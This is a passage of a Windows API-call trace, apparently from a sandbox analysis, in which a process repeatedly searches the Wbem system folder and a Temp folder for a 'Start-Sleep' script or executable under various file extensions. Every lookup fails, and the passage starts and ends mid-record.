lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x29 [0225.631] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0225.631] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.631] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.632] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psm1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.633] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x29 [0225.633] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0225.633] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.633] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.634] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psd1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.635] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.COM", lpFilePart=0x0) returned 0x28 [0225.635] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0225.635] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.635] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.636] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.COM", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.636] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x28 [0225.637] GetFullPathNameW (in: lpFileName="Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x34 [0225.637] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.637] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.638] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.EXE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.678] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x28 [0225.681] GetFullPathNameW (in: lpFileName="Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x34 [0225.681] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.681] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.682] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.BAT", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x28 [0225.683] GetFullPathNameW (in: lpFileName="Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x34 [0225.683] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.683] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.684] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CMD", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x28 [0225.685] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0225.685] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.685] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.686] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBS", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x28 [0225.687] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0225.687] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.687] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.688] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.VBE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.688] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.JS", lpFilePart=0x0) returned 0x27 [0225.689] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0225.689] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.689] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.690] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JS", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.690] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, 